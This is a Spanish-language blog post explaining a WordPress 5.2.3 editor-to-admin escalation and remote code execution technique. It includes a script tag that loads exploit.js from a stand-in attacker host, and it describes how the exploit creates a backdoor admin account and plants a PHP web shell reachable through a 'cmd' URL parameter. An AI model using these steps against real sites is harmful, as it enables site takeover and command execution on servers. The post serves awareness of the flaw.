¡Buenas a todos! Recientemente, el investigador Sivanesh Ashok ha descubierto un fallo de seguridad en WordPress que permite la elevación de privilegios y RC, y sobre el que me gustaría hablaros en el post de hoy.
El Ataque
Ejecutar el exploit que permite la elevación de privilegios es muy simple, el usuario autenticado como editor, deberá crear una nueva entrada que contendrá un bloque de código HTML.
Dentro de este bloque, podrá introducir el siguiente código javascript. Este código llama una librería necesaria y ejecuta el exploit
<script src="https://code.jquery.com/jquery-3.4.1.min.js"></script><script src="http://direccionremotadelatacante/exploit.js"></script>
A continuación, publicaríamos la entrada.
Para que el exploit se ejecute, el usuario administrador solamente tiene que visitar la entrada maliciosa.
Es importante recalcar que este exploit funciona en la última versión de WordPress 5.2.3
El Exploit
El exploit realiza dos acciones:
- Crea un nuevo usuario con permisos de administrador con las credenciales: backdoor:pwned
- Instala un plugin llamado “Mortgage Calculator Plus”, edita el código fuente del mismo para agregar código PHP que toma el valor del parámetro “cmd”, para ejecutar los comandos en el servidor y muestra la respuesta en pantalla.
Finalmente, se puede ejecutar cualquier comando en el servidor mediante la url http://victim.com/wp-content/plugins/mortgage-calculator-plus/mc-plus.php?cmd=[comando a ejecutar]
Wordpress ha indicado que no consideran esto una vulnerabilidad, por lo que no existirá parche de manera inmediata.
El efecto
Este exploit es principalmente importante porque generalmente las cuentas administrativas tienen mayor foco de atención, mientras que las cuentas de editor pueden ser personas no técnicas que podrían ser el vector de ataque para lograr privilegios administrativos en un sitio web con WordPress.
Video de la PoC